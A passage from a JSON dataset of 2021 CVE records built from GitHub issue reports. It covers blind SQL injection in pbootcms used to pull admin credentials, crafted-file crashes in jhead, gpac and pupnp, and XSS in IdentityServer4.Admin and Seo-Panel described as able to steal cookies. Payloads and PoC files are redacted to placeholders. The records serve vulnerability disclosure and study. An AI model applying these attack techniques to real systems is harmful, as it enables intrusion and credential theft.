        "description": "pbootcms. APITAG NUMBERTAG has SQL injection Vulnerability Type : SQL Injection Vulnerability Version NUMBERTAG Recurring environment: Windows NUMBERTAG PHP NUMBERTAG Apache NUMBERTAG Mysql NUMBERTAG ulnerability Description AND recurrence: The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database. the mysql database directory: PATHTAG image URLTAG Boolean based\u00a0blind\u00a0SQL\u00a0injection happened in this page. '$_ POST' sends an index array. The values in the array are brought into the \"where\" condition in the form of \"and\". image URLTAG When the condition is true: image URLTAG image URLTAG When the condition is false: image URLTAG image URLTAG payload: Because the data is filtered, only 'regexp' can be used for regular matching. image URLTAG image URLTAG and we can get the admin account name and password Detailed information NUMBERTAG ulnerability PATHTAG image URLTAG When the passed in parameter $where is an array, traverse the array, and when $where is an index APITAG APITAG the code to pass in the \u2018where\u2019 function as an index array: PATHTAG In APITAG the incoming data is assigned to the variable \"$receive\" for traversal, and \"$key\" is brought into APITAG for filtering. image URLTAG image URLTAG image URLTAG image URLTAG image URLTAG image URLTAG image URLTAG image URLTAG image URLTAG The values of the index array passed in through the above methods can only contain Chinese, letters, numbers, horizontal lines, dots, commas and spaces! It is encoded by APITAG and APITAG Finally, it is passed to '$where3'. image URLTAG image URLTAG image URLTAG The '$where3' in APITAG is controllable, and it will be brought into the statement in the form of 'and'.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28275",
        "Issue_Url_old": "https://github.com/Matthias-Wandel/jhead/issues/17",
        "Issue_Url_new": "https://github.com/matthias-wandel/jhead/issues/17",
        "Repo_new": "matthias-wandel/jhead",
        "Issue_Created_At": "2021-02-26T08:09:28Z",
        "description": "Multiple Segmentation fault in jhead via a crafted jpg file. Description of problem: Multiple Segmentation fault in jhead via a crafted jpg file Version Release number of selected component (if applicable): I tested the following version: Jhead version NUMBERTAG Jhead version NUMBERTAG How reproducible: git clone depth NUMBERTAG FILETAG && cd jhead && make CC=\"clang\" e CFLAGS=\" g fsanitize=address\" e LDFLAGS=\" g fsanitize=address\" Steps to Reproduce NUMBERTAG just run the following command Segmentation fault in APITAG APITAG Segmentation fault in Get NUMBERTAG u APITAG Segmentation fault in Get NUMBERTAG s APITAG poc\uff1a FILETAG They are all because of wild addr read. Actual results: Segmentation fault in APITAG ERRORTAG Segmentation fault in Get NUMBERTAG u ERRORTAG Segmentation fault in Get NUMBERTAG s ERRORTAG Additional info: Founder: giantbranch of NSFOCUS Security Team",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-28277",
        "Issue_Url_old": "https://github.com/Matthias-Wandel/jhead/issues/16",
        "Issue_Url_new": "https://github.com/matthias-wandel/jhead/issues/16",
        "Repo_new": "matthias-wandel/jhead",
        "Issue_Created_At": "2021-02-26T08:06:21Z",
        "description": "A heap based buffer overflow Read in APITAG in jpgfile.c. Description of problem: A heap based buffer overflow Read in APITAG in jpgfile.c Version Release number of selected component (if applicable): I tested the following version: Jhead version NUMBERTAG Jhead version NUMBERTAG How reproducible: git clone depth NUMBERTAG FILETAG && cd jhead && make CC=\"clang\" e CFLAGS=\" g fsanitize=address\" e LDFLAGS=\" g fsanitize=address\" Steps to Reproduce NUMBERTAG just run the following command APITAG poc\uff1a FILETAG Actual results: APITAG Report ERRORTAG Additional info: Founder: giantbranch of NSFOCUS Security Team",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-28278",
        "Issue_Url_old": "https://github.com/Matthias-Wandel/jhead/issues/15",
        "Issue_Url_new": "https://github.com/matthias-wandel/jhead/issues/15",
        "Repo_new": "matthias-wandel/jhead",
        "Issue_Created_At": "2021-02-26T08:04:46Z",
        "description": "A heap based buffer overflow Read in APITAG in jpgfile.c. Description of problem: A heap based buffer overflow Read in APITAG in jpgfile.c Version Release number of selected component (if applicable): I tested the following version: Jhead version NUMBERTAG Jhead version NUMBERTAG How reproducible: git clone depth NUMBERTAG FILETAG && cd jhead && make CC=\"clang\" e CFLAGS=\" g fsanitize=address\" e LDFLAGS=\" g fsanitize=address\" Steps to Reproduce NUMBERTAG just run the following command APITAG poc\uff1a FILETAG Actual results: APITAG Report ERRORTAG Additional info: Founder: giantbranch of NSFOCUS Security Team",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-28290",
        "Issue_Url_old": "https://github.com/skoruba/IdentityServer4.Admin/issues/813",
        "Issue_Url_new": "https://github.com/skoruba/identityserver4.admin/issues/813",
        "Repo_new": "skoruba/identityserver4.admin",
        "Issue_Created_At": "2021-03-11T17:17:35Z",
        "description": "XSS issue in Client Secrets and Api Resource Secrets. In the views APITAG and APITAG is not HTML encoded data attribute APITAG on the button: APITAG This data attribute is used in the dialog with secret detail. Fix: CODETAG I will send this fix asap. Thanks to Silton Santos for reporting.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-28300",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1702",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1702",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-03-11T02:05:00Z",
        "description": "A NULL pointer dereference in the function APITAG in APITAG . Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG gdb info: CODETAG ASAN info: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28302",
        "Issue_Url_old": "https://github.com/pupnp/pupnp/issues/249",
        "Issue_Url_new": "https://github.com/pupnp/pupnp/issues/249",
        "Repo_new": "pupnp/pupnp",
        "Issue_Created_At": "2021-03-12T02:54:55Z",
        "description": "Too many nested tags will lead to stack space exhaustion, resulting in signal NUMBERTAG SIGSEGV). hi, this poc caused a crash. When parsing xml, if there if too many \" APITAG \" in it ,that causes a crash. The problem is in the function APITAG \uff0c After parses all < a >, it can't find the closed node, and finally enters the errorhandler. When using APITAG When releases APITAG APITAG will release the child node APITAG recursively, which will consume stack space. If the recursive depth is not limited, it will cause crash. POC and crash are below. I suggest adding an interface that limits the depth of recursion. the stack size of my device $ulimit s NUMBERTAG poc: CODETAG android crash tombstone: Build fingerprint: PATHTAG format APITAG keys' Revision NUMBERTAG ABI: 'arm' Timestamp NUMBERTAG pid NUMBERTAG tid NUMBERTAG name: Thread NUMBERTAG APITAG <<< uid NUMBERTAG signal NUMBERTAG SIGSEGV), code NUMBERTAG SEGV_ACCERR), fault addr NUMBERTAG bd NUMBERTAG ff8 r0 b NUMBERTAG r NUMBERTAG bf1f r2 eca NUMBERTAG r NUMBERTAG a r4 b NUMBERTAG r NUMBERTAG c r NUMBERTAG r NUMBERTAG c r8 dbf NUMBERTAG c r9 dbf NUMBERTAG r NUMBERTAG a r NUMBERTAG dbf NUMBERTAG ip c NUMBERTAG e NUMBERTAG sp bd NUMBERTAG lr c NUMBERTAG pc c NUMBERTAG backtrace NUMBERTAG pc NUMBERTAG PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28417",
        "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/208",
        "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/208",
        "Repo_new": "seopanel/seo-panel",
        "Issue_Created_At": "2021-03-11T19:12:27Z",
        "description": "XSS Vulnerability in \"search_name\" parameter. Hi team, I would like to report XSS vulnerability. Description A cross site scripting (XSS) issue in the admin login panel in NUMBERTAG images version NUMBERTAG allows remote attackers to inject APITAG via the \"redirect\" parameter. ___ XSS Payload: APITAG ___ Vulnerable parameter: search_name ___ Steps to Reproduce the Issue NUMBERTAG Login to SEO admin panel NUMBERTAG Add below line at the end: APITAG NUMBERTAG APITAG search APITAG NUMBERTAG APITAG NUMBERTAG Hover your mouse near to \"CTR\" field As you can see, XSS is triggered and can send cookies to attacker. ___ Video POC: URLTAG ___ Impact With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2021-28418",
        "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/207",
        "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/207",
        "Repo_new": "seopanel/seo-panel",
        "Issue_Created_At": "2021-03-11T19:08:43Z",
        "description": "XSS Vulnerability in \"category: parameter. Hi team, I would like to report XSS vulnerability. Description A cross site scripting (XSS) issue in the admin login panel in NUMBERTAG images version NUMBERTAG allows remote attackers to inject APITAG via the \"redirect\" parameter. ___ XSS Payload : APITAG ___ Vulnerable parameter : category ___ Steps to Reproduce the Issue NUMBERTAG Login to SEO admin panel NUMBERTAG Add below line at the end: APITAG NUMBERTAG Hover your mouse to APITAG field As you can see, XSS is triggered and can send cookies to attacker. ___ Video POC : URLTAG ___ Impact With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2021-28419",
        "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/209",
        "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/209",
        "Repo_new": "seopanel/seo-panel",
        "Issue_Created_At": "2021-03-13T12:05:18Z",
